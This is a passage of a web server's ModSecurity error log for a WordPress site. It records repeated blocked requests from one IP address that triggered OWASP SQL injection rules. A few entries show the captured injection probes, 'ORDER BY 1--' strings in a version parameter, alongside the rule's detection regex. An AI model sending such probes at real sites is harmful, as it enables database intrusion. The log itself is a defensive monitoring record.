"/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1uJdLCjsWrLhZKAOZewAAAEI"] [Sat Aug 31 01:18:33.223531 2024] [:error] [pid 9366:tid 140590293370624] [client 193.29.13.20:37852] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1uQ1VuGGNTxm_kiOE0gAAANc"] [Sat Aug 31 01:18:33.853404 2024] [:error] [pid 8676:tid 140590368904960] [client 193.29.13.20:37854] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1uWm8LEssXUq6wJ2LOgAAAI4"] [Sat Aug 31 01:18:34.472536 2024] [:error] [pid 8676:tid 140590436046592] [client 193.29.13.20:37856] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1umm8LEssXUq6wJ2LOwAAAIY"] [Sat Aug 31 01:18:35.021951 2024] [:error] [pid 9366:tid 140590360512256] [client 193.29.13.20:37858] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47' ORDER BY 1-- QrqO"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1uw1VuGGNTxm_kiOE0wAAAM8"] [Sat Aug 31 01:18:35.617024 2024] [:error] [pid 8676:tid 140590360512256] [client 193.29.13.20:37860] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1u2m8LEssXUq6wJ2LPAAAAI8"] [Sat Aug 31 01:18:36.170372 2024] [:error] [pid 8672:tid 140590531704576] [client 193.29.13.20:37862] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1vA3r8UJC0kxJCKSq7gAAAAM"] [Sat Aug 31 01:18:36.711965 2024] [:error] [pid 8676:tid 140590326941440] [client 193.29.13.20:37866] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1vGm8LEssXUq6wJ2LPQAAAJM"] [Sat Aug 31 01:18:37.270124 2024] [:error] [pid 9366:tid 140590410868480] [client 193.29.13.20:37868] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1vQ1VuGGNTxm_kiOE1AAAAMk"] [Sat Aug 31 01:18:37.767710 2024] [:error] [pid 9366:tid 140590419261184] [client 193.29.13.20:37870] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1vQ1VuGGNTxm_kiOE1QAAAMg"] [Sat Aug 31 01:18:38.267499 2024] [:error] [pid 9366:tid 140590385690368] [client 193.29.13.20:37872] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1vg1VuGGNTxm_kiOE1gAAAMw"] [Sat Aug 31 01:18:38.839266 2024] [:error] [pid 9366:tid 140590556882688] [client 193.29.13.20:37876] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1vg1VuGGNTxm_kiOE1wAAAMA"] [Sat Aug 31 01:18:39.195260 2024] [:error] [pid 8675:tid 140590436046592] [client 193.29.13.20:37878] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1v5dLCjsWrLhZKAOZfAAAAEY"] [Sat Aug 31 01:18:39.787778 2024] [:error] [pid 8672:tid 140590556882688] [client 193.29.13.20:37880] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1vw3r8UJC0kxJCKSq7wAAAAA"] [Sat Aug 31 01:18:40.142396 2024] [:error] [pid 9366:tid 140590326941440] [client 193.29.13.20:37882] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1wA1VuGGNTxm_kiOE2AAAANM"] [Sat Aug 31 01:18:40.623964 2024] [:error] [pid 9366:tid 140590394083072] [client 193.29.13.20:37884] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47%' ORDER BY 1-- iFXj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1wA1VuGGNTxm_kiOE2QAAAMs"] [Sat Aug 31 01:18:41.122732 2024] [:error] [pid 8675:tid 140590419261184] [client 193.29.13.20:37886] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1wZdLCjsWrLhZKAOZfQAAAEg"] [Sat Aug 31 01:18:41.697405 2024] [:error] [pid 8672:tid 140590402475776] [client 193.29.13.20:37888] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1wQ3r8UJC0kxJCKSq8AAAAAo"] [Sat Aug 31 01:18:42.070150 2024] [:error] [pid 9366:tid 140590427653888] [client 193.29.13.20:37890] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1wg1VuGGNTxm_kiOE2gAAAMc"] [Sat Aug 31 01:18:42.574943 2024] [:error] [pid 9366:tid 140590284977920] [client 193.29.13.20:37892] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1wg1VuGGNTxm_kiOE2wAAANg"] [Sat Aug 31 01:18:43.093532 2024] [:error] [pid 9366:tid 140590548489984] [client 193.29.13.20:37894] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1ww1VuGGNTxm_kiOE3AAAAME"] [Sat Aug 31 01:18:43.444386 2024] [:error] [pid 8675:tid 140590394083072] [client 193.29.13.20:37896] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1w5dLCjsWrLhZKAOZfgAAAEs"] [Sat Aug 31 01:18:44.009150 2024] [:error] [pid 9366:tid 140590540097280] [client 193.29.13.20:37898] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1xA1VuGGNTxm_kiOE3QAAAMI"] [Sat Aug 31 01:18:44.556993 2024] [:error] [pid 9366:tid 140590377297664] [client 193.29.13.20:37900] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1xA1VuGGNTxm_kiOE3gAAAM0"] [Sat Aug 31 01:18:45.012988 2024] [:error] [pid 9366:tid 140590402475776] [client 193.29.13.20:37902] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1xQ1VuGGNTxm_kiOE3wAAAMo"] [Sat Aug 31 01:18:45.414080 2024] [:error] [pid 8672:tid 140590427653888] [client 193.29.13.20:37904] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1xQ3r8UJC0kxJCKSq8QAAAAc"] [Sat Aug 31 01:18:45.940481 2024] [:error] [pid 9366:tid 140590368904960] [client 193.29.13.20:37906] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47 ORDER BY 1-- HzTh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1xQ1VuGGNTxm_kiOE4AAAAM4"] [Sat Aug 31 01:18:46.423080 2024] [:error] [pid 9366:tid 140590531704576] [client 193.29.13.20:37908] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1xg1VuGGNTxm_kiOE4QAAAMM"] [Sat Aug 31 01:18:46.922601 2024] [:error] [pid 9366:tid 140590452832000] [client 193.29.13.20:37910] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1xg1VuGGNTxm_kiOE4gAAAMQ"] [Sat Aug 31 01:18:47.301400 2024] [:error] [pid 9366:tid 140590360512256] [client 193.29.13.20:37912] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1xw1VuGGNTxm_kiOE4wAAAM8"] [Sat Aug 31 01:18:47.727030 2024] [:error] [pid 9366:tid 140590410868480] [client 193.29.13.20:37914] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id 